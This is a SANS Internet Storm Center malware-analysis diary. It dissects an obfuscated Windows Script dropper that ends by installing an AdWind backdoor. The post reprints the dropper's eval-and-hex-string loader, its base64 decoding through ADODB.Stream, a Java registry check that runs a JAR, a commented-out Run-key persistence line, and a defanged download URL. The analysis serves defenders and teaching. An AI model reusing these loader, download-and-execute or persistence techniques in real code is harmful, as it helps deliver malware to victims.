Threat Level: green Handler on Duty: Xavier Mertens

SANS ISC: SANS Internet Storm Center SANS Internet Storm Center


Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!
[x] close video | All SANSFIRE Videos

Latest Diaries

If You Want Something Done Right, You Have To Do It Yourself... Malware Too!

Published: 2020-07-08
Last Updated: 2020-07-08 05:13:33 UTC
by Xavier Mertens (Version: 1)
0 comment(s)

I’m teaching FOR610[1] this week and today is dedicated to malicious web and document files. That’s a good opportunity to share with you a Windows Script that uses a nice obfuscation technique. The attacker's idea is to use a big array containing the second stage payload and interesting strings:

var Kerosene = [
function(){
var Odds = "m!FyIG5lbTQ0Ow0Km!FyIGxvb!mUZXh0ID0gIlVFc0RC ….”;
return [function(){
eval("Odds = Odds.replace(new RegExp(\"!@@\", \"g\"), \"A\");");
eval("\x4F\x64\x64\x73\x20\x3D\x20\x4F\x64\x64\x73\x2E\x72\x65\x70\x6C\x61\x63\x65\x28\x6E\x65\x77\x20\x52\x65\x67\x45\x78\x70\x28\x22\x6D\x22\x2C\x20\x22\x67\x22\x29\x2C\x20\x22\x64\x22\x29\x3B");
eval("\x4F\x64\x64\x73\x20\x3D\x20\x4F\x64\x64\x73\x2E\x72\x65\x70\x6C\x61\x63\x65\x28\x6E\x65\x77\x20\x52\x65\x67\x45\x78\x70\x28\x22\x21\x22\x2C\x20\x22\x67\x22\x29\x2C\x20\x22\x6D\x22\x29\x3B");
return Odds;
}][0]();
},
Array("CreateObject","ReadText","undefined","\x61\x64\x6F\x64\x62\x2E","\x43\x68\x61\x72\x53\x65\x74","\x50\x6F\x73\x69\x74\x69\x6F\x6E","\x54\x79\x70\x65","Open","Write","nodeTypedValue"),null
];

Like JavaScript, Windows Script is a language very permissive regarding data types and you can mix functions and strings in the same array. The first element of the array Kerozene[] is a function that deobfuscates a very long string that is also polluted with character substitutions. Once replaced, these characters with the right one, you can decode the Base64 string and get the second payload. The other elements are in a second array with some hex-encoded elements Then the following code is executed:

Kerosene[3] = Array(WSH[Kerosene[1][0]]("\x61\x64\x6F\x64\x62\x2E\x73\x74\x72\x65\x61\x6D"),
                    WSH[Kerosene[1][0]]("microsoft.xmldom").createElement("cfg"),
                    {bmx: "\x75\x73\x2D\x61\x73\x63\x69\x69"});
Kerosene[4] = function(){return Kerosene[3][0];};
[function(){
  Kerosene[3][1].dataType = "\x62\x69\x6E\x2E\x62\x61\x73\x65\x36\x34";
  Kerosene[3][1].text = Kerosene[0]();
  [function(){
    eval("Kerosene[4]()[Kerosene[1][6]] = 1;Kerosene[4]()[Kerosene[1][7]]();Kerosene[4]()[Kerosene[1][8]]. (Kerosene[3][1][Kerosene[1][9]]);");
    eval("Kerosene[4]()[Kerosene[1][5]] = 0;Kerosene[4]()[Kerosene[1][6]] = 2;");
    eval("Kerosene[4]()[Kerosene[1][4]] = Kerosene[3][2].bmx;");
    eval("Kerosene = [Array(eval), Kerosene[4](), [Kerosene[1][1]]];");
  }][0]();
}][0]();

Kerosene[0][0](Kerosene[1][Kerosene[2]]());

How does it work? References to elements of the array are replaced by their value during the execution. Example:

WSH[Kerosene[1][0]]("\x61\x64\x6F\x64\x62\x2E\x73\x74\x72\x65\x61\x6D")

becomes:

WSH[CreateOject("adodb.stream")

The second payload implements the same obfuscation technique (a Base64 payload is decoded after replacing some garbage characters). The script applies the principle of "help yourself". The interesting function is GrabJreFromNet() which tries to download a Java Runtime Environment if not already installed on the victim's computer. The package is grabbed from this URL: hxxp://ops[.]com[.]pa/jre7.zip

The script performs the following test to detect if Java is available or not:

var text = "";
try {
  text = wshShell.RegRead("HKLM\\SOFTWARE\\Wow6432Node\\JavaSoft\\Java Runtime Environment\\CurrentVersion");
  text = wshShell.RegRead("HKLM\\SOFTWARE\\Wow6432Node\\JavaSoft\\Java Runtime Environment\\" + text + "\\JavaHome");
} catch(err) {}
try {
  if (text == "") {
    text = wshShell.RegRead("HKLM\\SOFTWARE\\JavaSoft\\Java Runtime Environment\\CurrentVersion");
    text = wshShell.RegRead("HKLM\\SOFTWARE\\JavaSoft\\Java Runtime Environment\\" + text + "\\JavaHome");
    if (text != "") {
      text = text + "\\bin\\javaw.exe";
    }
  }
  else {
    text = text + "\\bin\\javaw.exe";
  }
} catch(err) {}
try {
  if (text != "") {
    //wshShell.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\ntfsmgr", "\"" + text + "\" -jar \"" + stubpath + "\"", "REG_SZ");
    wshShell.run ("\"" + text + "\" -jar \"" + stubpath + "\"");
  } else {
    GrabJreFromNet();
  }
} catch(err) {}

The third payload is a Zip file (a JAR file) that contains a classic AdWind backdoor (SHA256: 3c4e2ca8a7b7cd1eb7ff43851d19a456914f0e0307dfe259813172e955d7f2ab)[2].

[1] http://for610.com
[2] https://www.virustotal.com/gui/file/3c4e2ca8a7b7cd1eb7ff43851d19a456914f0e0307dfe259813172e955d7f2ab/detection

Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

0 comment(s)

If you have more information or corrections regarding our diary, please share.

Recent Diaries

F5 BigIP vulnerability exploitation followed by a backdoor implant attempt
Jul 7th 2020
18 hours ago by Renato (0 comments)

Happy Birthday DShield: DShield.org was registered 20 years ago.
Jul 7th 2020
20 hours ago by Johannes (0 comments)

Summary of CVE-2020-5902 F5 BIG-IP RCE Vulnerability Exploits
Jul 7th 2020
22 hours ago by Johannes (0 comments)

CVE-2020-5902: F5 BIG-IP RCE Vulnerability
Jul 6th 2020
2 days ago by DidierStevens (0 comments)

CVE-2020-5902 F5 BIG-IP Exploitation Attempt
Jul 5th 2020
2 days ago by DidierStevens (0 comments)

Wireshark 3.2.5 Released
Jul 5th 2020
3 days ago by DidierStevens (0 comments)

Happy FouRth of July from the Internet Storm Center
Jul 4th 2020
4 days ago by Russ McRee (0 comments)

Setting up the Dshield honeypot and tcp-honeypot.py
Jul 2nd 2020
6 days ago by Jim (0 comments)

Elastalert with Sigma
Jul 1st 2020
1 week ago by Tom (0 comments)

View All Diaries →

Latest Discussions

Security Policies
created Jun 30th 2020
1 week ago by Anonymous (1 reply)

IP Address from Hex
created Apr 15th 2020
2 months ago by Anonymous (0 replies)

Best Laptop for Wireshark 3.2
created Apr 14th 2020
2 months ago by ismicok (0 replies)

testgvbgjbhjb.com
created Mar 10th 2020
3 months ago by Bill (9 replies)

DShield analysis
created Mar 1st 2020
4 months ago by Anonymous (0 replies)

View All Forums →

Latest News

Top Diaries

An infection from Rig exploit kit
Jun 17th 2019
1 year ago by Brad (0 comments)

Using a Raspberry Pi honeypot to contribute data to DShield/ISC
Aug 3rd 2017
2 years ago by Johannes (0 comments)

Malspam with password-protected Word docs pushing Dridex
Jun 18th 2019
1 year ago by Brad (0 comments)

Wide-scale Petya variant ransomware attack noted
Jun 27th 2017
3 years ago by Brad (0 comments)

Keep an Eye on Disposable Email Addresses
Mar 7th 2019
1 year ago by Xme (0 comments)